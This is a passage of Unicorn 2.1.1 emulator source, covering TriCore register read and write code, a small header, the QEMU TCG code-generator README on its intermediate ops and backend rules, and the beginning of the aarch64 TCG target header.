                size_t *size)
{
    CPUTriCoreState *env = _env;
    uc_err ret = UC_ERR_ARG;

    if (regid >= UC_TRICORE_REG_A0 && regid <= UC_TRICORE_REG_A9) {
        CHECK_REG_TYPE(uint32_t);
        *(uint32_t *)value = env->gpr_a[regid - UC_TRICORE_REG_A0];
    } else if (regid >= UC_TRICORE_REG_A12 && regid <= UC_TRICORE_REG_A15) {
        CHECK_REG_TYPE(uint32_t);
        *(uint32_t *)value = env->gpr_a[regid - UC_TRICORE_REG_A0];
    } else if (regid >= UC_TRICORE_REG_D0 && regid <= UC_TRICORE_REG_D15) {
        CHECK_REG_TYPE(uint32_t);
        *(uint32_t *)value = env->gpr_d[regid - UC_TRICORE_REG_D0];
    } else {
        switch (regid) {
        // case UC_TRICORE_REG_SP:
        case UC_TRICORE_REG_A10:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->gpr_a[10];
            break;
        // case UC_TRICORE_REG_LR:
        case UC_TRICORE_REG_A11:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->gpr_a[11];
            break;
        case UC_TRICORE_REG_PC:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PC;
            break;
        case UC_TRICORE_REG_PCXI:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PCXI;
            break;
        case UC_TRICORE_REG_PSW:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PSW;
            break;
        case UC_TRICORE_REG_PSW_USB_C:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PSW_USB_C;
            break;
        case UC_TRICORE_REG_PSW_USB_V:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PSW_USB_V;
            break;
        case UC_TRICORE_REG_PSW_USB_SV:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PSW_USB_SV;
            break;
        case UC_TRICORE_REG_PSW_USB_AV:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PSW_USB_AV;
            break;
        case UC_TRICORE_REG_PSW_USB_SAV:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->PSW_USB_SAV;
            break;
        case UC_TRICORE_REG_SYSCON:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->SYSCON;
            break;
        case UC_TRICORE_REG_CPU_ID:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->CPU_ID;
            break;
        case UC_TRICORE_REG_BIV:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->BIV;
            break;
        case UC_TRICORE_REG_BTV:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->BTV;
            break;
        case UC_TRICORE_REG_ISP:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->ISP;
            break;
        case UC_TRICORE_REG_ICR:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->ICR;
            break;
        case UC_TRICORE_REG_FCX:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->FCX;
            break;
        case UC_TRICORE_REG_LCX:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->LCX;
            break;
        case UC_TRICORE_REG_COMPAT:
            CHECK_REG_TYPE(uint32_t);
            *(uint32_t *)value = env->COMPAT;
            break;
        }
    }

    return ret;
}

DEFAULT_VISIBILITY
uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value,
                 size_t *size, int *setpc)
{
    CPUTriCoreState *env = _env;
    uc_err ret = UC_ERR_ARG;

    if (regid >= UC_TRICORE_REG_A0 && regid <= UC_TRICORE_REG_A9) {
        CHECK_REG_TYPE(uint32_t);
        env->gpr_a[regid - UC_TRICORE_REG_A0] = *(uint32_t *)value;
    } else if (regid >= UC_TRICORE_REG_A12 && regid <= UC_TRICORE_REG_A15) {
        CHECK_REG_TYPE(uint32_t);
        env->gpr_a[regid - UC_TRICORE_REG_A0] = *(uint32_t *)value;
    } else if (regid >= UC_TRICORE_REG_D0 && regid <= UC_TRICORE_REG_D15) {
        CHECK_REG_TYPE(uint32_t);
        env->gpr_d[regid - UC_TRICORE_REG_D0] = *(uint32_t *)value;
    } else {
        switch (regid) {
        // case UC_TRICORE_REG_SP:
        case UC_TRICORE_REG_A10:
            CHECK_REG_TYPE(uint32_t);
            env->gpr_a[10] = *(uint32_t *)value;
            break;
        // case UC_TRICORE_REG_LR:
        case UC_TRICORE_REG_A11:
            CHECK_REG_TYPE(uint32_t);
            env->gpr_a[11] = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PC:
            CHECK_REG_TYPE(uint32_t);
            env->PC = *(uint32_t *)value;
            *setpc = 1;
            break;
        case UC_TRICORE_REG_PCXI:
            CHECK_REG_TYPE(uint32_t);
            env->PCXI = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PSW:
            CHECK_REG_TYPE(uint32_t);
            env->PSW = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PSW_USB_C:
            CHECK_REG_TYPE(uint32_t);
            env->PSW_USB_C = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PSW_USB_V:
            CHECK_REG_TYPE(uint32_t);
            env->PSW_USB_V = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PSW_USB_SV:
            CHECK_REG_TYPE(uint32_t);
            env->PSW_USB_SV = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PSW_USB_AV:
            CHECK_REG_TYPE(uint32_t);
            env->PSW_USB_AV = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_PSW_USB_SAV:
            CHECK_REG_TYPE(uint32_t);
            env->PSW_USB_SAV = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_SYSCON:
            CHECK_REG_TYPE(uint32_t);
            env->SYSCON = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_CPU_ID:
            CHECK_REG_TYPE(uint32_t);
            env->CPU_ID = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_BIV:
            CHECK_REG_TYPE(uint32_t);
            env->BIV = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_BTV:
            CHECK_REG_TYPE(uint32_t);
            env->BTV = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_ISP:
            CHECK_REG_TYPE(uint32_t);
            env->ISP = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_ICR:
            CHECK_REG_TYPE(uint32_t);
            env->ICR = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_FCX:
            CHECK_REG_TYPE(uint32_t);
            env->FCX = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_LCX:
            CHECK_REG_TYPE(uint32_t);
            env->LCX = *(uint32_t *)value;
            break;
        case UC_TRICORE_REG_COMPAT:
            CHECK_REG_TYPE(uint32_t);
            env->COMPAT = *(uint32_t *)value;
            break;
        }
    }

    return ret;
}

static int tricore_cpus_init(struct uc_struct *uc, const char *cpu_model)
{
    TriCoreCPU *cpu;

    cpu = cpu_tricore_init(uc);
    if (cpu == NULL) {
        return -1;
    }

    return 0;
}

static void tricore_release(void *ctx)
{
    int i;
    TCGContext *tcg_ctx = (TCGContext *)ctx;
    TriCoreCPU *cpu = (TriCoreCPU *)tcg_ctx->uc->cpu;
    CPUTLBDesc *d = cpu->neg.tlb.d;
    CPUTLBDescFast *f = cpu->neg.tlb.f;
    CPUTLBDesc *desc;
    CPUTLBDescFast *fast;

    release_common(ctx);
    for (i = 0; i < NB_MMU_MODES; i++) {
        desc = &(d[i]);
        fast = &(f[i]);
        g_free(desc->iotlb);
        g_free(fast->table);
    }
}

DEFAULT_VISIBILITY
void uc_init(struct uc_struct *uc)
{
    uc->reg_read = reg_read;
    uc->reg_write = reg_write;
    uc->reg_reset = reg_reset;
    uc->set_pc = tricore_set_pc;
    uc->get_pc = tricore_get_pc;
    uc->cpus_init = tricore_cpus_init;
    uc->release = tricore_release;
    uc->cpu_context_size = offsetof(CPUTriCoreState, end_reset_fields);
    uc_common_init(uc);
}

unicorn-2.1.1/qemu/target/tricore/unicorn.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */
/* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022
   Copyright 2022 Aptiv */

#ifndef UC_QEMU_TARGET_TRICORE_H
#define UC_QEMU_TARGET_TRICORE_H

// functions to read & write registers
uc_err reg_read_tricore(void *env, int mode, unsigned int regid, void *value,
                        size_t *size);
uc_err reg_write_tricore(void *env, int mode, unsigned int regid,
                         const void *value, size_t *size, int *setpc);

void uc_init_tricore(struct uc_struct *uc);

#endif

unicorn-2.1.1/qemu/tcg/README

Tiny Code Generator - Fabrice Bellard.
1) Introduction TCG (Tiny Code Generator) began as a generic backend for a C compiler. It was simplified to be used in QEMU. It also has its roots in the QOP code generator written by Paul Brook. 2) Definitions TCG receives RISC-like "TCG ops" and performs some optimizations on them, including liveness analysis and trivial constant expression evaluation. TCG ops are then implemented in the host CPU back end, also known as the TCG "target". The TCG "target" is the architecture for which we generate the code. It is of course not the same as the "target" of QEMU which is the emulated architecture. As TCG started as a generic C backend used for cross compiling, it is assumed that the TCG target is different from the host, although it is never the case for QEMU. In this document, we use "guest" to specify what architecture we are emulating; "target" always means the TCG target, the machine on which we are running QEMU. A TCG "function" corresponds to a QEMU Translated Block (TB). A TCG "temporary" is a variable only live in a basic block. Temporaries are allocated explicitly in each function. A TCG "local temporary" is a variable only live in a function. Local temporaries are allocated explicitly in each function. A TCG "global" is a variable which is live in all the functions (equivalent of a C global variable). They are defined before the functions defined. A TCG global can be a memory location (e.g. a QEMU CPU register), a fixed host register (e.g. the QEMU CPU state pointer) or a memory location which is stored in a register outside QEMU TBs (not implemented yet). A TCG "basic block" corresponds to a list of instructions terminated by a branch instruction. An operation with "undefined behavior" may result in a crash. An operation with "unspecified behavior" shall not crash. However, the result may be one of several possibilities so may be considered an "undefined result". 3) Intermediate representation 3.1) Introduction TCG instructions operate on variables which are temporaries, local temporaries or globals. TCG instructions and variables are strongly typed. Two types are supported: 32 bit integers and 64 bit integers. Pointers are defined as an alias to 32 bit or 64 bit integers depending on the TCG target word size. Each instruction has a fixed number of output variable operands, input variable operands and always constant operands. The notable exception is the call instruction which has a variable number of outputs and inputs. In the textual form, output operands usually come first, followed by input operands, followed by constant operands. The output type is included in the instruction name. Constants are prefixed with a '$'. add_i32 t0, t1, t2 (t0 <- t1 + t2) 3.2) Assumptions * Basic blocks - Basic blocks end after branches (e.g. brcond_i32 instruction), goto_tb and exit_tb instructions. - Basic blocks start after the end of a previous basic block, or at a set_label instruction. After the end of a basic block, the content of temporaries is destroyed, but local temporaries and globals are preserved. * Floating point types are not supported yet * Pointers: depending on the TCG target, pointer size is 32 bit or 64 bit. The type TCG_TYPE_PTR is an alias to TCG_TYPE_I32 or TCG_TYPE_I64. * Helpers: Using the tcg_gen_helper_x_y it is possible to call any function taking i32, i64 or pointer types. By default, before calling a helper, all globals are stored at their canonical location and it is assumed that the function can modify them. 
By default, the helper is allowed to modify the CPU state or raise an exception. This can be overridden using the following function modifiers: - TCG_CALL_NO_READ_GLOBALS means that the helper does not read globals, either directly or via an exception. They will not be saved to their canonical locations before calling the helper. - TCG_CALL_NO_WRITE_GLOBALS means that the helper does not modify any globals. They will only be saved to their canonical location before calling helpers, but they won't be reloaded afterwards. - TCG_CALL_NO_SIDE_EFFECTS means that the call to the function is removed if the return value is not used. Note that TCG_CALL_NO_READ_GLOBALS implies TCG_CALL_NO_WRITE_GLOBALS. On some TCG targets (e.g. x86), several calling conventions are supported. * Branches: Use the instruction 'br' to jump to a label. 3.3) Code Optimizations When generating instructions, you can count on at least the following optimizations: - Single instructions are simplified, e.g. and_i32 t0, t0, $0xffffffff is suppressed. - A liveness analysis is done at the basic block level. The information is used to suppress moves from a dead variable to another one. It is also used to remove instructions which compute dead results. The later is especially useful for condition code optimization in QEMU. In the following example: add_i32 t0, t1, t2 add_i32 t0, t0, $1 mov_i32 t0, $1 only the last instruction is kept. 3.4) Instruction Reference ********* Function call * call <ret> <params> ptr call function 'ptr' (pointer type) <ret> optional 32 bit or 64 bit return value <params> optional 32 bit or 64 bit parameters ********* Jumps/Labels * set_label $label Define label 'label' at the current program point. * br $label Jump to label. * brcond_i32/i64 t0, t1, cond, label Conditional jump if t0 cond t1 is true. cond can be: TCG_COND_EQ TCG_COND_NE TCG_COND_LT /* signed */ TCG_COND_GE /* signed */ TCG_COND_LE /* signed */ TCG_COND_GT /* signed */ TCG_COND_LTU /* unsigned */ TCG_COND_GEU /* unsigned */ TCG_COND_LEU /* unsigned */ TCG_COND_GTU /* unsigned */ ********* Arithmetic * add_i32/i64 t0, t1, t2 t0=t1+t2 * sub_i32/i64 t0, t1, t2 t0=t1-t2 * neg_i32/i64 t0, t1 t0=-t1 (two's complement) * mul_i32/i64 t0, t1, t2 t0=t1*t2 * div_i32/i64 t0, t1, t2 t0=t1/t2 (signed). Undefined behavior if division by zero or overflow. * divu_i32/i64 t0, t1, t2 t0=t1/t2 (unsigned). Undefined behavior if division by zero. * rem_i32/i64 t0, t1, t2 t0=t1%t2 (signed). Undefined behavior if division by zero or overflow. * remu_i32/i64 t0, t1, t2 t0=t1%t2 (unsigned). Undefined behavior if division by zero. ********* Logical * and_i32/i64 t0, t1, t2 t0=t1&t2 * or_i32/i64 t0, t1, t2 t0=t1|t2 * xor_i32/i64 t0, t1, t2 t0=t1^t2 * not_i32/i64 t0, t1 t0=~t1 * andc_i32/i64 t0, t1, t2 t0=t1&~t2 * eqv_i32/i64 t0, t1, t2 t0=~(t1^t2), or equivalently, t0=t1^~t2 * nand_i32/i64 t0, t1, t2 t0=~(t1&t2) * nor_i32/i64 t0, t1, t2 t0=~(t1|t2) * orc_i32/i64 t0, t1, t2 t0=t1|~t2 * clz_i32/i64 t0, t1, t2 t0 = t1 ? clz(t1) : t2 * ctz_i32/i64 t0, t1, t2 t0 = t1 ? ctz(t1) : t2 ********* Shifts/Rotates * shl_i32/i64 t0, t1, t2 t0=t1 << t2. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * shr_i32/i64 t0, t1, t2 t0=t1 >> t2 (unsigned). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * sar_i32/i64 t0, t1, t2 t0=t1 >> t2 (signed). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * rotl_i32/i64 t0, t1, t2 Rotation of t2 bits to the left. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) * rotr_i32/i64 t0, t1, t2 Rotation of t2 bits to the right. 
Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) ********* Misc * mov_i32/i64 t0, t1 t0 = t1 Move t1 to t0 (both operands must have the same type). * ext8s_i32/i64 t0, t1 ext8u_i32/i64 t0, t1 ext16s_i32/i64 t0, t1 ext16u_i32/i64 t0, t1 ext32s_i64 t0, t1 ext32u_i64 t0, t1 8, 16 or 32 bit sign/zero extension (both operands must have the same type) * bswap16_i32/i64 t0, t1 16 bit byte swap on a 32/64 bit value. It assumes that the two/six high order bytes are set to zero. * bswap32_i32/i64 t0, t1 32 bit byte swap on a 32/64 bit value. With a 64 bit value, it assumes that the four high order bytes are set to zero. * bswap64_i64 t0, t1 64 bit byte swap * discard_i32/i64 t0 Indicate that the value of t0 won't be used later. It is useful to force dead code elimination. * deposit_i32/i64 dest, t1, t2, pos, len Deposit T2 as a bitfield into T1, placing the result in DEST. The bitfield is described by POS/LEN, which are immediate values: LEN - the length of the bitfield POS - the position of the first bit, counting from the LSB For example, "deposit_i32 dest, t1, t2, 8, 4" indicates a 4-bit field at bit 8. This operation would be equivalent to dest = (t1 & ~0x0f00) | ((t2 << 8) & 0x0f00) * extract_i32/i64 dest, t1, pos, len * sextract_i32/i64 dest, t1, pos, len Extract a bitfield from T1, placing the result in DEST. The bitfield is described by POS/LEN, which are immediate values, as above for deposit. For extract_*, the result will be extended to the left with zeros; for sextract_*, the result will be extended to the left with copies of the bitfield sign bit at pos + len - 1. For example, "sextract_i32 dest, t1, 8, 4" indicates a 4-bit field at bit 8. This operation would be equivalent to dest = (t1 << 20) >> 28 (using an arithmetic right shift). * extract2_i32/i64 dest, t1, t2, pos For N = {32,64}, extract an N-bit quantity from the concatenation of t2:t1, beginning at pos. The tcg_gen_extract2_{i32,i64} expander accepts 0 <= pos <= N as inputs. The backend code generator will not see either 0 or N as inputs for these opcodes. * extrl_i64_i32 t0, t1 For 64-bit hosts only, extract the low 32-bits of input T1 and place it into 32-bit output T0. Depending on the host, this may be a simple move, or may require additional canonicalization. * extrh_i64_i32 t0, t1 For 64-bit hosts only, extract the high 32-bits of input T1 and place it into 32-bit output T0. Depending on the host, this may be a simple shift, or may require additional canonicalization. ********* Conditional moves * setcond_i32/i64 dest, t1, t2, cond dest = (t1 cond t2) Set DEST to 1 if (T1 cond T2) is true, otherwise set to 0. * movcond_i32/i64 dest, c1, c2, v1, v2, cond dest = (c1 cond c2 ? v1 : v2) Set DEST to V1 if (C1 cond C2) is true, otherwise set to V2. ********* Type conversions * ext_i32_i64 t0, t1 Convert t1 (32 bit) to t0 (64 bit) and does sign extension * extu_i32_i64 t0, t1 Convert t1 (32 bit) to t0 (64 bit) and does zero extension * trunc_i64_i32 t0, t1 Truncate t1 (64 bit) to t0 (32 bit) * concat_i32_i64 t0, t1, t2 Construct t0 (64-bit) taking the low half from t1 (32 bit) and the high half from t2 (32 bit). * concat32_i64 t0, t1, t2 Construct t0 (64-bit) taking the low half from t1 (64 bit) and the high half from t2 (64 bit). 
********* Load/Store * ld_i32/i64 t0, t1, offset ld8s_i32/i64 t0, t1, offset ld8u_i32/i64 t0, t1, offset ld16s_i32/i64 t0, t1, offset ld16u_i32/i64 t0, t1, offset ld32s_i64 t0, t1, offset ld32u_i64 t0, t1, offset t0 = read(t1 + offset) Load 8, 16, 32 or 64 bits with or without sign extension from host memory. offset must be a constant. * st_i32/i64 t0, t1, offset st8_i32/i64 t0, t1, offset st16_i32/i64 t0, t1, offset st32_i64 t0, t1, offset write(t0, t1 + offset) Write 8, 16, 32 or 64 bits to host memory. All this opcodes assume that the pointed host memory doesn't correspond to a global. In the latter case the behaviour is unpredictable. ********* Multiword arithmetic support * add2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high * sub2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high Similar to add/sub, except that the double-word inputs T1 and T2 are formed from two single-word arguments, and the double-word output T0 is returned in two single-word outputs. * mulu2_i32/i64 t0_low, t0_high, t1, t2 Similar to mul, except two unsigned inputs T1 and T2 yielding the full double-word product T0. The later is returned in two single-word outputs. * muls2_i32/i64 t0_low, t0_high, t1, t2 Similar to mulu2, except the two inputs T1 and T2 are signed. * mulsh_i32/i64 t0, t1, t2 * muluh_i32/i64 t0, t1, t2 Provide the high part of a signed or unsigned multiply, respectively. If mulu2/muls2 are not provided by the backend, the tcg-op generator can obtain the same results can be obtained by emitting a pair of opcodes, mul+muluh/mulsh. ********* Memory Barrier support * mb <$arg> Generate a target memory barrier instruction to ensure memory ordering as being enforced by a corresponding guest memory barrier instruction. The ordering enforced by the backend may be stricter than the ordering required by the guest. It cannot be weaker. This opcode takes a constant argument which is required to generate the appropriate barrier instruction. The backend should take care to emit the target barrier instruction only when necessary i.e., for SMP guests and when MTTCG is enabled. The guest translators should generate this opcode for all guest instructions which have ordering side effects. Please see docs/devel/atomics.txt for more information on memory barriers. ********* 64-bit guest on 32-bit host support The following opcodes are internal to TCG. Thus they are to be implemented by 32-bit host code generators, but are not to be emitted by guest translators. They are emitted as needed by inline functions within "tcg-op.h". * brcond2_i32 t0_low, t0_high, t1_low, t1_high, cond, label Similar to brcond, except that the 64-bit values T0 and T1 are formed from two 32-bit arguments. * setcond2_i32 dest, t1_low, t1_high, t2_low, t2_high, cond Similar to setcond, except that the 64-bit values T1 and T2 are formed from two 32-bit arguments. The result is a 32-bit value. ********* QEMU specific operations * exit_tb t0 Exit the current TB and return the value t0 (word type). * goto_tb index Exit the current TB and jump to the TB index 'index' (constant) if the current TB was linked to this TB. Otherwise execute the next instructions. Only indices 0 and 1 are valid and tcg_gen_goto_tb may be issued at most once with each slot index per TB. * lookup_and_goto_ptr tb_addr Look up a TB address ('tb_addr') and jump to it if valid. If not valid, jump to the TCG epilogue to go back to the exec loop. This operation is optional. 
If the TCG backend does not implement the goto_ptr opcode, emitting this op is equivalent to emitting exit_tb(0). * qemu_ld_i32/i64 t0, t1, flags, memidx * qemu_st_i32/i64 t0, t1, flags, memidx Load data at the guest address t1 into t0, or store data in t0 at guest address t1. The _i32/_i64 size applies to the size of the input/output register t0 only. The address t1 is always sized according to the guest, and the width of the memory operation is controlled by flags. Both t0 and t1 may be split into little-endian ordered pairs of registers if dealing with 64-bit quantities on a 32-bit host. The memidx selects the qemu tlb index to use (e.g. user or kernel access). The flags are the MemOp bits, selecting the sign, width, and endianness of the memory access. For a 32-bit host, qemu_ld/st_i64 is guaranteed to only be used with a 64-bit memory access specified in flags. ********* Host vector operations All of the vector ops have two parameters, TCGOP_VECL & TCGOP_VECE. The former specifies the length of the vector in log2 64-bit units; the later specifies the length of the element (if applicable) in log2 8-bit units. E.g. VECL=1 -> 64 << 1 -> v128, and VECE=2 -> 1 << 2 -> i32. * mov_vec v0, v1 * ld_vec v0, t1 * st_vec v0, t1 Move, load and store. * dup_vec v0, r1 Duplicate the low N bits of R1 into VECL/VECE copies across V0. * dupi_vec v0, c Similarly, for a constant. Smaller values will be replicated to host register size by the expanders. * dup2_vec v0, r1, r2 Duplicate r2:r1 into VECL/64 copies across V0. This opcode is only present for 32-bit hosts. * add_vec v0, v1, v2 v0 = v1 + v2, in elements across the vector. * sub_vec v0, v1, v2 Similarly, v0 = v1 - v2. * mul_vec v0, v1, v2 Similarly, v0 = v1 * v2. * neg_vec v0, v1 Similarly, v0 = -v1. * abs_vec v0, v1 Similarly, v0 = v1 < 0 ? -v1 : v1, in elements across the vector. * smin_vec: * umin_vec: Similarly, v0 = MIN(v1, v2), for signed and unsigned element types. * smax_vec: * umax_vec: Similarly, v0 = MAX(v1, v2), for signed and unsigned element types. * ssadd_vec: * sssub_vec: * usadd_vec: * ussub_vec: Signed and unsigned saturating addition and subtraction. If the true result is not representable within the element type, the element is set to the minimum or maximum value for the type. * and_vec v0, v1, v2 * or_vec v0, v1, v2 * xor_vec v0, v1, v2 * andc_vec v0, v1, v2 * orc_vec v0, v1, v2 * not_vec v0, v1 Similarly, logical operations with and without complement. Note that VECE is unused. * shli_vec v0, v1, i2 * shls_vec v0, v1, s2 Shift all elements from v1 by a scalar i2/s2. I.e. for (i = 0; i < VECL/VECE; ++i) { v0[i] = v1[i] << s2; } * shri_vec v0, v1, i2 * sari_vec v0, v1, i2 * shrs_vec v0, v1, s2 * sars_vec v0, v1, s2 Similarly for logical and arithmetic right shift. * shlv_vec v0, v1, v2 Shift elements from v1 by elements from v2. I.e. for (i = 0; i < VECL/VECE; ++i) { v0[i] = v1[i] << v2[i]; } * shrv_vec v0, v1, v2 * sarv_vec v0, v1, v2 Similarly for logical and arithmetic right shift. * cmp_vec v0, v1, v2, cond Compare vectors by element, storing -1 for true and 0 for false. * bitsel_vec v0, v1, v2, v3 Bitwise select, v0 = (v2 & v1) | (v3 & ~v1), across the entire vector. * cmpsel_vec v0, c1, c2, v3, v4, cond Select elements based on comparison results: for (i = 0; i < n; ++i) { v0[i] = (c1[i] cond c2[i]) ? v3[i] : v4[i]. } ********* Note 1: Some shortcuts are defined when the last operand is known to be a constant (e.g. addi for add, movi for mov). 
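
One detail of the vector ops listed above is worth making concrete before the backend section: cmp_vec storing all-ones for true and zero for false is exactly what lets it compose with bitsel_vec into per-element selects. Here is a scalar reference model, with the vector shape fixed at four 32-bit lanes purely for the sketch (real VECL/VECE handling is the backend's business):

    #include <assert.h>
    #include <stdint.h>

    #define LANES 4

    /* cmp_vec semantics: per element, -1 for true, 0 for false
     * (TCG_COND_GTU, i.e. unsigned greater-than, shown). */
    static void cmp_gtu_vec(uint32_t v0[LANES], const uint32_t v1[LANES],
                            const uint32_t v2[LANES])
    {
        for (int i = 0; i < LANES; ++i) {
            v0[i] = (v1[i] > v2[i]) ? ~0u : 0u;
        }
    }

    /* bitsel_vec semantics: v0 = (v2 & v1) | (v3 & ~v1), bitwise. */
    static void bitsel_vec(uint32_t v0[LANES], const uint32_t v1[LANES],
                           const uint32_t v2[LANES], const uint32_t v3[LANES])
    {
        for (int i = 0; i < LANES; ++i) {
            v0[i] = (v2[i] & v1[i]) | (v3[i] & ~v1[i]);
        }
    }

    int main(void)
    {
        uint32_t a[LANES] = {5, 0, 9, 2};
        uint32_t b[LANES] = {3, 7, 9, 1};
        uint32_t mask[LANES], out[LANES];

        cmp_gtu_vec(mask, a, b);     /* mask = {~0, 0, 0, ~0} */
        bitsel_vec(out, mask, a, b); /* a[i] where a[i] > b[i], else b[i] */

        for (int i = 0; i < LANES; ++i) {
            assert(out[i] == (a[i] > b[i] ? a[i] : b[i]));
        }
        return 0;
    }

The composition computes an unsigned per-lane maximum, the same kind of fallback a generator can use when the host has cmp_vec and bitsel_vec but no native umax_vec.
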
Note 2: When using TCG, the opcodes must never be generated directly as some of them may not be available as "real" opcodes. Always use the function tcg_gen_xxx(args). 4) Backend tcg-target.h contains the target specific definitions. tcg-target.inc.c contains the target specific code; it is #included by tcg/tcg.c, rather than being a standalone C file. 4.1) Assumptions The target word size (TCG_TARGET_REG_BITS) is expected to be 32 bit or 64 bit. It is expected that the pointer has the same size as the word. On a 32 bit target, all 64 bit operations are converted to 32 bits. A few specific operations must be implemented to allow it (see add2_i32, sub2_i32, brcond2_i32). On a 64 bit target, the values are transferred between 32 and 64-bit registers using the following ops: - trunc_shr_i64_i32 - ext_i32_i64 - extu_i32_i64 They ensure that the values are correctly truncated or extended when moved from a 32-bit to a 64-bit register or vice-versa. Note that the trunc_shr_i64_i32 is an optional op. It is not necessary to implement it if all the following conditions are met: - 64-bit registers can hold 32-bit values - 32-bit values in a 64-bit register do not need to stay zero or sign extended - all 32-bit TCG ops ignore the high part of 64-bit registers Floating point operations are not supported in this version. A previous incarnation of the code generator had full support of them, but it is better to concentrate on integer operations first. 4.2) Constraints GCC like constraints are used to define the constraints of every instruction. Memory constraints are not supported in this version. Aliases are specified in the input operands as for GCC. The same register may be used for both an input and an output, even when they are not explicitly aliased. If an op expands to multiple target instructions then care must be taken to avoid clobbering input values. GCC style "early clobber" outputs are supported, with '&'. A target can define specific register or constant constraints. If an operation uses a constant input constraint which does not allow all constants, it must also accept registers in order to have a fallback. The constraint 'i' is defined generically to accept any constant. The constraint 'r' is not defined generically, but is consistently used by each backend to indicate all registers. The movi_i32 and movi_i64 operations must accept any constants. The mov_i32 and mov_i64 operations must accept any registers of the same type. The ld/st/sti instructions must accept signed 32 bit constant offsets. This can be implemented by reserving a specific register in which to compute the address if the offset is too big. The ld/st instructions must accept any destination (ld) or source (st) register. The sti instruction may fail if it cannot store the given constant. 4.3) Function call assumptions - The only supported types for parameters and return value are: 32 and 64 bit integers and pointer. - The stack grows downwards. - The first N parameters are passed in registers. - The next parameters are passed on the stack by storing them as words. - Some registers are clobbered during the call. - The function can return 0 or 1 value in registers. On a 32 bit target, functions must be able to return 2 values in registers for 64 bit return type. 5) Recommended coding rules for best performance - Use globals to represent the parts of the QEMU CPU state which are often modified, e.g. the integer registers and the condition codes. TCG will be able to use host registers to store them. 
unicorn-2.1.1/qemu/tcg/aarch64/tcg-target.h

/* * Initial TCG Implementation for aarch64 * * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH * Written by Claudio Fontana * * This work is licensed under the terms of the GNU GPL, version 2 or * (at your option) any later version. * * See the COPYING file in the top-level directory for details.
*/ #ifndef AARCH64_TCG_TARGET_H #define AARCH64_TCG_TARGET_H #if defined(__APPLE__) #include <libkern/OSCacheControl.h> #endif #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 24 #undef TCG_TARGET_STACK_GROWSUP typedef enum { TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, TCG_REG_X16, TCG_REG_X17, TCG_REG_X18, TCG_REG_X19, TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, TCG_REG_X28, TCG_REG_X29, TCG_REG_X30, /* X31 is either the stack pointer or zero, depending on context. */ TCG_REG_SP = 31, TCG_REG_XZR = 31, TCG_REG_V0 = 32, TCG_REG_V1, TCG_REG_V2, TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, TCG_REG_V8, TCG_REG_V9, TCG_REG_V10, TCG_REG_V11, TCG_REG_V12, TCG_REG_V13, TCG_REG_V14, TCG_REG_V15, TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, TCG_REG_V20, TCG_REG_V21, TCG_REG_V22, TCG_REG_V23, TCG_REG_V24, TCG_REG_V25, TCG_REG_V26, TCG_REG_V27, TCG_REG_V28, TCG_REG_V29, TCG_REG_V30, TCG_REG_V31, /* Aliases. */ TCG_REG_FP = TCG_REG_X29, TCG_REG_LR = TCG_REG_X30, TCG_AREG0 = TCG_REG_X19, } TCGReg; #define TCG_TARGET_NB_REGS 64 /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_SP #define 